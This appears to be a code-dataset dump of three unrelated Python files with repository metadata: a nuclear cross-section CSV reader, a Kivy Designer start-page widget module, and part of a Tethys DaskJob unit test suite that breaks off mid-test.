] | 1 | 2022-01-04T22:21:18.000Z | 2022-01-04T22:21:18.000Z | pyIsoDep/tests/read_csv.py | DanKotlyar/PYTHON-ISOTOPIC-DEPLETION-PACKAGE | d9da8be6eff4ba301f9689ce5c38a5e50856d033 | [
"MIT"
] | null | null | null | pyIsoDep/tests/read_csv.py | DanKotlyar/PYTHON-ISOTOPIC-DEPLETION-PACKAGE | d9da8be6eff4ba301f9689ce5c38a5e50856d033 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""read_csv
Read the different csv files
Created on Mon Oct 11 21:30:00 2021 @author: Dan Kotlyar
Last updated on Mon Oct 11 21:45:00 2021 @author: Dan Kotlyar
"""
import numpy as np
import pandas as pd
def ReadCsv(csvFile):
data = pd.read_csv('bootstrap.csv')
ID = np.array(data['ZAID'], dtype=int)
xsTypes = np.array(data['MT'], dtype=int)
xsVals = np.array(data["XS [barns]"], dtype=float)
N0 = np.array(data["N0 [atoms/b-cm]"], dtype=float)
fullID = np.unique(ID) # unique isotopes
nIsotopes = len(fullID)
# 1-ID, 2-ND, 3-cap, 4-fiss, 5-(n,alpha)
xsTable = np.zeros((nIsotopes, 5))
xsTable[:, 0] = fullID
# obtain all the cross section types
numMTs = np.array([102, 18, 107])
for idx, numMT in enumerate(numMTs):
vals, idxFull, idx0 =\
np.intersect1d(fullID, ID[xsTypes == numMT], assume_unique=False,
return_indices=True)
if idx == 0:
xsTable[idxFull, 1] = N0[xsTypes == numMT][idx0]
xsTable[idxFull, idx+2] = xsVals[xsTypes == numMT][idx0]
idxFields = {"ID": 0, "N0": 1, "sig_c": 2, "sig_alpha": 3, "sig_f": 4}
return xsTable, idxFields
| 28.255814 | 77 | 0.604115 |
import numpy as np
import pandas as pd
def ReadCsv(csvFile):
data = pd.read_csv('bootstrap.csv')
ID = np.array(data['ZAID'], dtype=int)
xsTypes = np.array(data['MT'], dtype=int)
xsVals = np.array(data["XS [barns]"], dtype=float)
N0 = np.array(data["N0 [atoms/b-cm]"], dtype=float)
fullID = np.unique(ID)
nIsotopes = len(fullID)
xsTable = np.zeros((nIsotopes, 5))
xsTable[:, 0] = fullID
numMTs = np.array([102, 18, 107])
for idx, numMT in enumerate(numMTs):
vals, idxFull, idx0 =\
np.intersect1d(fullID, ID[xsTypes == numMT], assume_unique=False,
return_indices=True)
if idx == 0:
xsTable[idxFull, 1] = N0[xsTypes == numMT][idx0]
xsTable[idxFull, idx+2] = xsVals[xsTypes == numMT][idx0]
idxFields = {"ID": 0, "N0": 1, "sig_c": 2, "sig_alpha": 3, "sig_f": 4}
return xsTable, idxFields
| true | true |
f710383da7cf5e7b2bacdc981bb14cc2aeedc558 | 6,434 | py | Python | components/start_page.py | SrGambiarra/KivyStudioDesigner | 7f617b60aef3d5e99865cb559b9b5ee93a1988f5 | [
"MIT"
] | 3 | 2022-03-05T21:54:34.000Z | 2022-03-15T12:55:45.000Z | components/start_page.py | SrGambiarra/KivyStudioDesigner | 7f617b60aef3d5e99865cb559b9b5ee93a1988f5 | [
"MIT"
] | 2 | 2022-03-13T04:15:47.000Z | 2022-03-30T11:51:41.000Z | components/start_page.py | SrGambiarra/KivyStudioDesigner | 7f617b60aef3d5e99865cb559b9b5ee93a1988f5 | [
"MIT"
] | null | null | null | __all__ = [
'DesignerLinkLabel', 'RecentItem',
'RecentFilesBox' 'DesignerStartPage']
from utils.utils import get_designer, get_fs_encoding
from kivy.properties import ObjectProperty, StringProperty
from kivy.uix.scrollview import ScrollView
from kivy.uix.boxlayout import BoxLayout
from kivy.lang.builder import Builder
from kivy.uix.button import Button
import webbrowser
Builder.load_string("""
#: import theme_atlas utils.utils.theme_atlas
<DesignerButtonFit@DesignerButton>
size_hint_x: None
width: (self.texture_size[0]+sp(32))
<DesignerStartPage>:
btn_open: btn_open
btn_new: btn_new
recent_files_box: recent_files_box
orientation: 'vertical'
padding: (0, 0, 0, dp(20))
Label:
text: 'Kivy Designer'
font_size: '26pt'
size_hint_y: None
height: '40pt'
Label:
markup: True
text: '[i]Innovative User Interfaces, Desktop, and Mobile Development Made Easy.[/i]'
font_size: pt(12)
halign: 'center'
size_hint_y: None
height: '15pt'
GridLayout:
cols: 2
size_hint: None, None
height: self.minimum_height
width: self.minimum_width
pos_hint: {'center_x': 0.5}
padding: (0, pt(15), 0, 0)
spacing: '4sp'
DesignerButtonFit:
id: btn_open
text: 'Open Project'
on_release: root.dispatch('on_open_down')
DesignerButtonFit:
id: btn_new
text: 'New Project'
on_release: root.dispatch('on_new_down')
Label:
text: 'Getting Started'
font_size: '16pt'
bold: True
size_hint_y: None
height: '30pt'
GridLayout:
kivy_label: kivy_label
cols: 2
size_hint: None, None
height: self.minimum_height
width: '450dp'
pos_hint: {'center_x': 0.5}
row_force_default: True
row_default_height: '40sp'
spacing: '4sp'
padding: '16sp', '0sp'
DesignerLinkLabel:
id: kivy_label
text: ' Kivy'
link: 'http://kivy.org'
DesignerLinkLabel:
text: ' Kivy Designer Help'
on_release: root.dispatch('on_help')
DesignerLinkLabel:
id: kivy_label
text: ' Kivy Documentation'
link: 'http://kivy.org/docs'
DesignerLinkLabel:
text: ' Kivy Designer Documentation'
link: 'http://kivy-designer.readthedocs.org/'
Label:
text: 'Recent Projects'
font_size: '16pt'
bold: True
size_hint_y: None
height: '30pt'
RecentFilesBox:
id: recent_files_box
pos_hint: {'center_x': 0.5}
size_hint_x: None
width: '600dp'
canvas.before:
Color:
rgba: (1, 1, 1, 0.05)
Rectangle:
pos: self.pos
size: self.size
<DesignerLinkLabel>:
color: (0, 0, 1, 1)
background_normal: theme_atlas('action_item')
background_disabled_normal: theme_atlas('action_item_disabled')
text_size: self.width, None
<RecentFilesBox>:
grid: grid
cols: 1
padding: '2sp'
size_hint_x: None
bar_width: '10dp'
scroll_type: ['bars', 'content']
GridLayout:
id: grid
cols: 1
size_hint_y: None
height: '1dp'
<RecentItem>:
orientation: 'vertical'
size_hint: 1, None
height: '40dp'
on_touch_down: if self.collide_point(*args[1].pos): root.dispatch('on_press')
canvas.after:
Color:
rgb: (0.2, 0.2, 0.2)
Rectangle:
pos: ((self.x+dp(25)), self.y)
size: ((self.width-dp(50)), dp(1))
Label:
text: root.path
text_size: self.size
valign: 'middle'
shorten: True
padding_x: '20dp'
""")
class DesignerLinkLabel(Button):
'''DesignerLinkLabel displays a http link and opens it in a browser window
when clicked.
'''
link = StringProperty(None)
'''Contains the http link to be opened.
:data:`link` is a :class:`~kivy.properties.StringProperty`
'''
def on_release(self, *args):
'''Default event handler for 'on_release' event.
'''
if self.link:
webbrowser.open(self.link)
class RecentItem(BoxLayout):
path = StringProperty('')
'''Contains the application path
:data:`path` is a :class:`~kivy.properties.StringProperty`
'''
__events__ = ('on_press', )
def on_press(self, *args):
'''Item pressed
'''
class RecentFilesBox(ScrollView):
'''Container consistings of buttons, with their names specifying
the recent files.
'''
grid = ObjectProperty(None)
'''The grid layout consisting of all buttons.
This property is an instance of :class:`~kivy.uix.gridlayout`
:data:`grid` is a :class:`~kivy.properties.ObjectProperty`
'''
def __init__(self, **kwargs):
super(RecentFilesBox, self).__init__(**kwargs)
def add_recent(self, list_files):
'''To add buttons representing Recent Files.
:param list_files: array of paths
'''
for p in list_files:
if isinstance(p, bytes):
p = p.decode(get_fs_encoding())
recent_item = RecentItem(path=p)
self.grid.add_widget(recent_item)
recent_item.bind(on_press=self.btn_release)
self.grid.height += recent_item.height
self.grid.height = max(self.grid.height, self.height)
def btn_release(self, instance):
'''Event Handler for 'on_release' of an event.
'''
d = get_designer()
d.ids.toll_bar_top._perform_open(instance.path)
class DesignerStartPage(BoxLayout):
recent_files_box = ObjectProperty(None)
'''This property is an instance
of :class:`~designer.components.start_page.RecentFilesBox`
:data:`recent_files_box` is a :class:`~kivy.properties.ObjectProperty`
'''
__events__ = ('on_open_down', 'on_new_down', 'on_help')
def on_open_down(self, *args):
'''Default Event Handler for 'on_open_down'
'''
pass
def on_new_down(self, *args):
'''Default Event Handler for 'on_new_down'
'''
pass
def on_help(self, *args):
'''Default Event Handler for 'on_help'
'''
pass
| 27.495726 | 93 | 0.594809 | __all__ = [
'DesignerLinkLabel', 'RecentItem',
'RecentFilesBox' 'DesignerStartPage']
from utils.utils import get_designer, get_fs_encoding
from kivy.properties import ObjectProperty, StringProperty
from kivy.uix.scrollview import ScrollView
from kivy.uix.boxlayout import BoxLayout
from kivy.lang.builder import Builder
from kivy.uix.button import Button
import webbrowser
Builder.load_string("""
#: import theme_atlas utils.utils.theme_atlas
<DesignerButtonFit@DesignerButton>
size_hint_x: None
width: (self.texture_size[0]+sp(32))
<DesignerStartPage>:
btn_open: btn_open
btn_new: btn_new
recent_files_box: recent_files_box
orientation: 'vertical'
padding: (0, 0, 0, dp(20))
Label:
text: 'Kivy Designer'
font_size: '26pt'
size_hint_y: None
height: '40pt'
Label:
markup: True
text: '[i]Innovative User Interfaces, Desktop, and Mobile Development Made Easy.[/i]'
font_size: pt(12)
halign: 'center'
size_hint_y: None
height: '15pt'
GridLayout:
cols: 2
size_hint: None, None
height: self.minimum_height
width: self.minimum_width
pos_hint: {'center_x': 0.5}
padding: (0, pt(15), 0, 0)
spacing: '4sp'
DesignerButtonFit:
id: btn_open
text: 'Open Project'
on_release: root.dispatch('on_open_down')
DesignerButtonFit:
id: btn_new
text: 'New Project'
on_release: root.dispatch('on_new_down')
Label:
text: 'Getting Started'
font_size: '16pt'
bold: True
size_hint_y: None
height: '30pt'
GridLayout:
kivy_label: kivy_label
cols: 2
size_hint: None, None
height: self.minimum_height
width: '450dp'
pos_hint: {'center_x': 0.5}
row_force_default: True
row_default_height: '40sp'
spacing: '4sp'
padding: '16sp', '0sp'
DesignerLinkLabel:
id: kivy_label
text: ' Kivy'
link: 'http://kivy.org'
DesignerLinkLabel:
text: ' Kivy Designer Help'
on_release: root.dispatch('on_help')
DesignerLinkLabel:
id: kivy_label
text: ' Kivy Documentation'
link: 'http://kivy.org/docs'
DesignerLinkLabel:
text: ' Kivy Designer Documentation'
link: 'http://kivy-designer.readthedocs.org/'
Label:
text: 'Recent Projects'
font_size: '16pt'
bold: True
size_hint_y: None
height: '30pt'
RecentFilesBox:
id: recent_files_box
pos_hint: {'center_x': 0.5}
size_hint_x: None
width: '600dp'
canvas.before:
Color:
rgba: (1, 1, 1, 0.05)
Rectangle:
pos: self.pos
size: self.size
<DesignerLinkLabel>:
color: (0, 0, 1, 1)
background_normal: theme_atlas('action_item')
background_disabled_normal: theme_atlas('action_item_disabled')
text_size: self.width, None
<RecentFilesBox>:
grid: grid
cols: 1
padding: '2sp'
size_hint_x: None
bar_width: '10dp'
scroll_type: ['bars', 'content']
GridLayout:
id: grid
cols: 1
size_hint_y: None
height: '1dp'
<RecentItem>:
orientation: 'vertical'
size_hint: 1, None
height: '40dp'
on_touch_down: if self.collide_point(*args[1].pos): root.dispatch('on_press')
canvas.after:
Color:
rgb: (0.2, 0.2, 0.2)
Rectangle:
pos: ((self.x+dp(25)), self.y)
size: ((self.width-dp(50)), dp(1))
Label:
text: root.path
text_size: self.size
valign: 'middle'
shorten: True
padding_x: '20dp'
""")
class DesignerLinkLabel(Button):
link = StringProperty(None)
def on_release(self, *args):
if self.link:
webbrowser.open(self.link)
class RecentItem(BoxLayout):
path = StringProperty('')
__events__ = ('on_press', )
def on_press(self, *args):
class RecentFilesBox(ScrollView):
grid = ObjectProperty(None)
def __init__(self, **kwargs):
super(RecentFilesBox, self).__init__(**kwargs)
def add_recent(self, list_files):
for p in list_files:
if isinstance(p, bytes):
p = p.decode(get_fs_encoding())
recent_item = RecentItem(path=p)
self.grid.add_widget(recent_item)
recent_item.bind(on_press=self.btn_release)
self.grid.height += recent_item.height
self.grid.height = max(self.grid.height, self.height)
def btn_release(self, instance):
d = get_designer()
d.ids.toll_bar_top._perform_open(instance.path)
class DesignerStartPage(BoxLayout):
recent_files_box = ObjectProperty(None)
__events__ = ('on_open_down', 'on_new_down', 'on_help')
def on_open_down(self, *args):
pass
def on_new_down(self, *args):
pass
def on_help(self, *args):
pass
| true | true |
f710388df0a9cbdd89b532dfa9a6713fd5628352 | 19,496 | py | Python | tests/unit_tests/test_tethys_compute/test_models/test_dask/test_DaskJob.py | msouff/tethys | 45795d1e6561d5db8fddd838f4d1ae1d91dbb837 | [
"BSD-2-Clause"
] | null | null | null | tests/unit_tests/test_tethys_compute/test_models/test_dask/test_DaskJob.py | msouff/tethys | 45795d1e6561d5db8fddd838f4d1ae1d91dbb837 | [
"BSD-2-Clause"
] | 1 | 2018-09-20T21:27:14.000Z | 2018-09-20T21:27:14.000Z | tests/unit_tests/test_tethys_compute/test_models/test_dask/test_DaskJob.py | msouff/tethys | 45795d1e6561d5db8fddd838f4d1ae1d91dbb837 | [
"BSD-2-Clause"
] | null | null | null | from tethys_sdk.testing import TethysTestCase
from tethys_compute.models.dask.dask_scheduler import Scheduler, DaskScheduler
from tethys_compute.models.dask.dask_job import DaskJob
from django.contrib.auth.models import User
import dask
from unittest import mock
import time
@dask.delayed
def inc(x):
return x + 1
@dask.delayed
def double(x):
return x + 2
@dask.delayed
def add(x, y):
time.sleep(2)
return x + y
class DaskJobTest(TethysTestCase):
def set_up(self):
self.user = User.objects.create_user('tethys_super', 'user@example.com', 'pass')
self.scheduler = DaskScheduler(
name='test_dask_scheduler',
host='127.0.0.1:8000',
timeout=10,
heartbeat_interval=5,
dashboard='test_dashboard',
)
self.scheduler.save()
def tear_down(self):
self.scheduler.delete()
@mock.patch('tethys_compute.models.dask.dask_job.Client')
def test_client_prop_with_invalid_scheduler(self, mock_client):
mock_client.return_value = 'test_client'
djob = DaskJob(name='test_dj', user=self.user, key='test_key', label='label', scheduler=None)
# Execute
ret = djob.client
# Check result
self.assertEqual('test_client', ret)
mock_client.assert_called()
@mock.patch('tethys_compute.models.dask.dask_scheduler.Client')
def test_client_prop_with_valid_scheduler(self, mock_client):
mock_client.return_value = 'test_client'
dask_scheduler = Scheduler.objects.get_subclass(name='test_dask_scheduler')
djob = DaskJob(name='test_dj', user=self.user, key='test_key', label='label', scheduler=dask_scheduler)
# Execute
ret = djob.client
# Check result
self.assertEqual('test_client', ret)
mock_client.assert_called_with(address='127.0.0.1:8000', heartbeat_interval=5, timeout=10)
@mock.patch('tethys_compute.models.dask.dask_job.Client')
def test_client_no_scheduler_prop(self, mock_client):
mock_client.return_value = 'test_default_client'
# Create DaskJob
djob = DaskJob(name='test_dj', user=self.user, label='label')
# Execute
ret = djob.client
# Check result
self.assertEqual('test_default_client', ret)
mock_client.assert_called_with()
@mock.patch('tethys_compute.models.dask.dask_scheduler.Client')
@mock.patch('tethys_compute.models.dask.dask_job.Future')
def test_future_prop(self, mock_future, mock_client):
mock_client_ret = mock.MagicMock()
mock_client.return_value = mock_client_ret
mock_client_ret.submit.return_value = mock.MagicMock(key='test_key')
# Create DaskJob
djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler)
# Get Scheduler Client from DaskJob using client property
client = djob.client
# Use this Client to run rando function with a future handler
future = client.submit(inc, 1)
# Get the key from future handler and assign it to DaskJob key to keep track of this inc function
djob.key = future.key
# Use DaskJob future property to get back the inc function
ret = djob.future
# Check result
mock_future.assert_called_with(key='test_key', client=mock_client_ret)
self.assertEqual(mock_future(), ret)
@mock.patch('tethys_compute.models.dask.dask_scheduler.Client')
def test_future_prop_no_key(self, mock_client):
mock_client_ret = mock.MagicMock()
mock_client.return_value = mock_client_ret
mock_client_ret.submit.return_value = mock.MagicMock(key='test_key')
# Create DaskJob
djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler)
# Get Scheduler Client from DaskJob using client property
client = djob.client
# Use this Client to run inc function with a future handler
client.submit(inc, 1)
# Use DaskJob future property to get back the inc function
ret = djob.future
# Check result
self.assertIsNone(ret)
@mock.patch('tethys_compute.models.dask.dask_job.log')
@mock.patch('tethys_compute.models.dask.dask_scheduler.Client')
@mock.patch('tethys_compute.models.dask.dask_job.Future')
def test_future_prop_exception(self, mock_future, mock_client, mock_log):
mock_client_ret = mock.MagicMock()
mock_client.return_value = mock_client_ret
mock_client_ret.submit.return_value = mock.MagicMock(key='test_key')
mock_future.side_effect = Exception('exception in creating future')
# Create DaskJob
djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler)
# Get Scheduler Client from DaskJob using client property
client = djob.client
# Use this Client to run inc function with a future handler
future = client.submit(inc, 1)
# Get the key from future handler and assign it to DaskJob key to keep track of this inc function
djob.key = future.key
# Use DaskJob future property to get back the inc function
ret = djob.future
# Check result
self.assertIsNone(ret)
mock_log.exception.assert_called_with('Dask Future Init Error')
@mock.patch('tethys_compute.models.dask.dask_job.fire_and_forget')
@mock.patch('django.db.models.base.Model.save')
@mock.patch('tethys_compute.models.dask.dask_scheduler.Client')
def test_execute_delayed(self, mock_client, mock_save, mock_ff):
mock_client_ret = mock.MagicMock()
mock_client.return_value = mock_client_ret
mock_future = mock.MagicMock(key='test_key')
mock_client_ret.compute.return_value = mock_future
# Create DaskJob
djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler)
# Delayed option
delayed = dask.delayed(inc)(1)
# _Execute
djob._execute(delayed)
# Check result
mock_client_ret.compute.assert_called_with(delayed)
self.assertEqual('test_key', djob.key)
mock_save.assert_called()
mock_ff.assert_called_with(mock_future)
@mock.patch('tethys_compute.models.dask.dask_job.isinstance')
@mock.patch('tethys_compute.models.dask.dask_job.fire_and_forget')
@mock.patch('django.db.models.base.Model.save')
@mock.patch('tethys_compute.models.dask.dask_scheduler.Client')
def test_execute_future(self, mock_client, mock_save, mock_ff, mock_isinstance):
mock_client.return_value = mock.MagicMock()
mock_isinstance.side_effect = [True, False]
# Create DaskJob
djob = DaskJob(
name='test_dj',
user=self.user,
label='label',
scheduler=self.scheduler
)
# get client from DaskJob
client = djob.client
# Future option
future = client.submit(inc, 2)
# _Execute
djob._execute(future)
# Check result
self.assertEqual(future.key, djob.key)
mock_save.assert_called()
mock_ff.assert_called_with(future)
def test_execute_not_future_delayed(self):
# Create DaskJob
djob = DaskJob(
name='test_dj',
user=self.user,
label='label',
scheduler=self.scheduler
)
# _Execute
self.assertRaises(ValueError, djob._execute, 1)
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob.client')
@mock.patch('django.db.models.base.Model.save')
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob.future')
def test_update_status(self, mock_future, mock_save, mock_client):
mock_future.status = 'finished'
# Create DaskJob
djob = DaskJob(
name='test_dj',
user=self.user,
label='label',
scheduler=self.scheduler
)
# call the function
djob._update_status()
# check the results
mock_client.close.assert_called()
mock_save.assert_called()
def test_update_status_with_no_future(self):
# Create DaskJob
djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler)
# check the results
self.assertIsNone(djob._update_status())
@mock.patch('tethys_compute.models.dask.dask_job.log')
@mock.patch('django.db.models.base.Model.save')
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob.future')
def test_update_status_exception(self, mock_future, mock_save, mock_log):
# Invalid status key
mock_future.status = 'foo'
# Create DaskJob
djob = DaskJob(
name='test_dj',
user=self.user,
label='label',
scheduler=self.scheduler
)
# call the function
djob._update_status()
# check the results
mock_log.error.assert_called_with('Unknown Dask Status: "foo"')
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob._acquire_pr_lock')
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob._release_pr_lock')
def test_process_result_with_failed_lock(self, mock_re_lock, mock_apl):
mock_apl.return_value = False
# Create DaskJob
djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler,
_process_results_function='test_function')
# call the function
self.assertIsNone(djob._process_results())
# check the result
mock_re_lock.assert_not_called()
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob.future',
new_callable=mock.PropertyMock(return_value=None))
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob._acquire_pr_lock')
def test_process_result_no_future(self, mock_apl, _):
mock_apl.return_value = True
# Create DaskJob
djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler,
_process_results_function='test_function')
# call the function
self.assertIsNone(djob._process_results())
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob.client')
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob.future',
new_callable=mock.PropertyMock())
def test_process_result_forget(self, _, mock_client):
# Create DaskJob
djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler, forget=True)
# call the function
ret = djob._process_results()
# check the result
mock_client.close.assert_called()
self.assertIsNone(ret)
@mock.patch('tethys_compute.models.tethys_job.TethysFunctionExtractor')
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob.future')
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob.client')
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob._acquire_pr_lock')
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob._release_pr_lock')
def test_process_result_with_result_function(self, mock_re_lock, mock_apl, mock_client, mock_future, mock_tfe):
fake_key = 'sum_faef'
mock_function_extractor = mock.MagicMock()
mock_function = mock.MagicMock(return_value='foo')
mock_function_extractor.valid = True
mock_function_extractor.function = mock_function
mock_tfe.return_value = mock_function_extractor
mock_apl.return_value = True
# Create DaskJob
djob = DaskJob(
name='test_dj',
user=self.user,
label='label',
scheduler=self.scheduler,
_process_results_function='test_function'
)
djob.key = fake_key
# call the function
djob._process_results()
# check the result
mock_client.close.assert_called()
mock_client.gather.assert_called_with(mock_future)
mock_function.assert_called_with(mock_client.gather())
mock_client.set_metadata.assert_called_with(fake_key, False)
self.assertEqual('', djob.key)
mock_re_lock.assert_called()
@mock.patch('tethys_compute.models.tethys_job.TethysFunctionExtractor')
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob.future')
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob.client')
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob._acquire_pr_lock')
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob._release_pr_lock')
@mock.patch('tethys_compute.models.dask.dask_job.log')
def test_process_result_with_client_gather_exception(self, mock_logger, mock_re_lock, mock_apl, mock_client,
mock_future, mock_tfe):
mock_function_extractor = mock.MagicMock()
mock_function = mock.MagicMock(return_value='foo')
mock_function_extractor.valid = True
mock_function_extractor.function = mock_function
mock_tfe.return_value = mock_function_extractor
mock_apl.return_value = True
gather_exception = Exception('Fake exception')
mock_client.gather.side_effect = gather_exception
# Create DaskJob
djob = DaskJob(
name='test_dj',
user=self.user,
label='label',
scheduler=self.scheduler,
_process_results_function='test_function'
)
# call the function
djob._process_results()
# check the result
mock_client.gather.assert_called_with(mock_future)
mock_logger.warning.assert_called()
mock_function.assert_called_with(gather_exception)
mock_re_lock.assert_called()
@mock.patch('django.db.models.base.Model.save')
@mock.patch('tethys_compute.models.dask.dask_job.log')
@mock.patch('tethys_compute.models.tethys_job.TethysFunctionExtractor')
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob.future')
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob.client')
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob._acquire_pr_lock')
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob._release_pr_lock')
def test_process_result_with_result_function_with_exception(self, mock_re_lock, mock_apl, _, mock_client,
mock_tfe, mock_log, mock_save):
mock_function_extractor = mock.MagicMock()
mock_function = mock.MagicMock()
mock_function.side_effect = Exception
mock_function_extractor.valid = True
mock_function_extractor.function = mock_function
mock_tfe.return_value = mock_function_extractor
mock_apl.return_value = True
# Create DaskJob
djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler,
_process_results_function='test_function')
# call the function
djob._process_results()
# check the result
mock_log.exception.assert_called_with('Process Results Function Error')
self.assertEqual('ERR', djob._status)
mock_save.assert_called()
mock_re_lock.assert_called()
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob.future')
def test_stop(self, mock_future):
# Create DaskJob
djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler)
# call the stop function
djob.stop()
# Check result
mock_future.cancel.assert_called()
def test_pause(self):
djob = DaskJob(name='test_dj', user=self.user, key='test_key', label='label', scheduler=self.scheduler)
# Execute and heck result
self.assertRaises(NotImplementedError, djob.pause)
def test_resume(self):
djob = DaskJob(name='test_dj', user=self.user, key='test_key', label='label', scheduler=self.scheduler)
# Execute and heck result
self.assertRaises(NotImplementedError, djob.resume)
def test_result(self):
# Create DaskJob
djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler)
# need to convert to string because it will convert to string when saving to the database
djob.result = 'serialized_results'
# call the function
ret = djob.result
# Check result
self.assertEqual('serialized_results', ret)
def test_result_none(self):
# Create DaskJob
djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler)
djob.result = None
# call the function
ret = djob.result
# Check result
self.assertIsNone(ret)
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob.future')
def test_done(self, mock_future):
# Create DaskJob
djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler)
# call the done function
ret = djob.done()
# Check result
mock_future.done.assert_called()
self.assertEqual(mock_future.done(), ret)
def test_done_with_no_future(self):
# Create DaskJob
djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler)
# Check result
self.assertIsNone(djob.done())
def test_update_status_interval_prop(self):
from datetime import timedelta
# Create DaskJob
djob = DaskJob(name='test_daskjob', user=self.user, label='label')
djob.save()
ret = DaskJob.objects.get(name='test_daskjob').update_status_interval
# Check result
self.assertIsInstance(ret, timedelta)
self.assertEqual(timedelta(0, 0), ret)
djob.delete()
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob.future')
def test_retry(self, mock_future):
# Create DaskJob
djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler)
# call the done function
djob.retry()
# Check result
mock_future.retry.assert_called()
def test_retry_no_future(self):
# Create DaskJob
djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler)
# call the done function
self.assertIsNone(djob.retry())
@mock.patch('tethys_compute.models.dask.dask_job.log')
def test_fail_acquire_pr_lock(self, mock_log):
# Create DaskJob
djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler)
djob.extended_properties['processing_results'] = True
self.assertFalse(djob._acquire_pr_lock())
mock_log.warning.assert_called_with('Unable to aquire lock. Processing results already occurring. Skipping...')
@mock.patch('django.db.models.base.Model.save')
def test_fail_release_pr_lock(self, mock_save):
# Create DaskJob
djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler)
djob.extended_properties['processing_results'] = True
djob._release_pr_lock()
self.assertFalse(djob.extended_properties['processing_results'])
mock_save.assert_called()
| 36.237918 | 119 | 0.671933 | from tethys_sdk.testing import TethysTestCase
from tethys_compute.models.dask.dask_scheduler import Scheduler, DaskScheduler
from tethys_compute.models.dask.dask_job import DaskJob
from django.contrib.auth.models import User
import dask
from unittest import mock
import time
@dask.delayed
def inc(x):
return x + 1
@dask.delayed
def double(x):
return x + 2
@dask.delayed
def add(x, y):
time.sleep(2)
return x + y
class DaskJobTest(TethysTestCase):
def set_up(self):
self.user = User.objects.create_user('tethys_super', 'user@example.com', 'pass')
self.scheduler = DaskScheduler(
name='test_dask_scheduler',
host='127.0.0.1:8000',
timeout=10,
heartbeat_interval=5,
dashboard='test_dashboard',
)
self.scheduler.save()
def tear_down(self):
self.scheduler.delete()
@mock.patch('tethys_compute.models.dask.dask_job.Client')
def test_client_prop_with_invalid_scheduler(self, mock_client):
mock_client.return_value = 'test_client'
djob = DaskJob(name='test_dj', user=self.user, key='test_key', label='label', scheduler=None)
ret = djob.client
self.assertEqual('test_client', ret)
mock_client.assert_called()
@mock.patch('tethys_compute.models.dask.dask_scheduler.Client')
def test_client_prop_with_valid_scheduler(self, mock_client):
mock_client.return_value = 'test_client'
dask_scheduler = Scheduler.objects.get_subclass(name='test_dask_scheduler')
djob = DaskJob(name='test_dj', user=self.user, key='test_key', label='label', scheduler=dask_scheduler)
ret = djob.client
self.assertEqual('test_client', ret)
mock_client.assert_called_with(address='127.0.0.1:8000', heartbeat_interval=5, timeout=10)
@mock.patch('tethys_compute.models.dask.dask_job.Client')
def test_client_no_scheduler_prop(self, mock_client):
mock_client.return_value = 'test_default_client'
djob = DaskJob(name='test_dj', user=self.user, label='label')
ret = djob.client
self.assertEqual('test_default_client', ret)
mock_client.assert_called_with()
@mock.patch('tethys_compute.models.dask.dask_scheduler.Client')
@mock.patch('tethys_compute.models.dask.dask_job.Future')
def test_future_prop(self, mock_future, mock_client):
mock_client_ret = mock.MagicMock()
mock_client.return_value = mock_client_ret
mock_client_ret.submit.return_value = mock.MagicMock(key='test_key')
djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler)
client = djob.client
future = client.submit(inc, 1)
djob.key = future.key
ret = djob.future
mock_future.assert_called_with(key='test_key', client=mock_client_ret)
self.assertEqual(mock_future(), ret)
@mock.patch('tethys_compute.models.dask.dask_scheduler.Client')
def test_future_prop_no_key(self, mock_client):
mock_client_ret = mock.MagicMock()
mock_client.return_value = mock_client_ret
mock_client_ret.submit.return_value = mock.MagicMock(key='test_key')
djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler)
client = djob.client
client.submit(inc, 1)
ret = djob.future
self.assertIsNone(ret)
@mock.patch('tethys_compute.models.dask.dask_job.log')
@mock.patch('tethys_compute.models.dask.dask_scheduler.Client')
@mock.patch('tethys_compute.models.dask.dask_job.Future')
def test_future_prop_exception(self, mock_future, mock_client, mock_log):
mock_client_ret = mock.MagicMock()
mock_client.return_value = mock_client_ret
mock_client_ret.submit.return_value = mock.MagicMock(key='test_key')
